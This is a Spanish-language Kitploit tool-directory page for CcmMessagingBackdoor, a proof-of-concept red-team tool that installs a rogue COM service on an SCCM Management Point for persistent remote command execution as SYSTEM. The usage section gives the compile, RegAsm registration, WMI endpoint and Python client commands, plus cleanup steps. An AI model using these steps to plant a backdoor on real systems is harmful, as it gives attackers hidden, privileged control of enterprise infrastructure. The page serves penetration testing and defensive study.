Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CcmMessagingBackdoor — Backdoor de prueba de concepto para SCCM Management Point que utiliza un servicio COM rogue para la ejecución remota persistente de comandos como SYSTEM. | Kitploit
Herramientas/GitHubGitHub/synacktiv/ccmmessagingbackdoor
Mecanismos de PersistenciaPost-ExplotaciónComando y ControlRed TeamingHerramienta de Acceso RemotoDesarrollo de Payloads
GitHubsynacktiv/ccmmessagingbackdoor

CcmMessagingBackdoor

Backdoor de prueba de concepto para SCCM Management Point que utiliza un servicio COM rogue para la ejecución remota persistente de comandos como SYSTEM.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
192hace 1 añoAún no revisado

CcmMessagingBackdoor

Herramienta de prueba de concepto para construir e instalar un servicio CcmMessaging rogue para mantener acceso en un Management Point

Uso

  • Compilar e instalar el servicio COM rogue en el Management Point
root@kitploit:~
# Compile
PS C:\> C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe /t:library /out:c:\rogue.dll RogueCcmEndpoint.cs

# Register CLSID
PS C:\> C:\Windows\Microsoft.NET\Framework64\v2.0.50727\RegAsm.exe /codebase c:\rogue.dll
  • Configurar el endpoint del servicio en WMI
root@kitploit:~
PS C:\>  ./wmi_create_rogue_service_endpoint.ps1
  • Usar el cliente Python para ejecutar comandos de PowerShell
root@kitploit:~
$ python3 ccmmessaging_backdoor_client.py -t https://mp.corp.local -s MP_Backdoor 'whoami'
[...]
<BackdoorResponse>nt authority\system
</BackdoorResponse>
  • Para limpiar
root@kitploit:~
# Unregister CLSID
PS C:\> C:\Windows\Microsoft.NET\Framework64\v2.0.50727\RegAsm.exe /unregister c:\rogue.dll

PS C:\> ./wmi_remove_rogue_service_endpoint.ps1

TODO

  • Corregir el fallo aleatorio del proceso CcmExec (motivo desconocido por ahora)
Descargar herramienta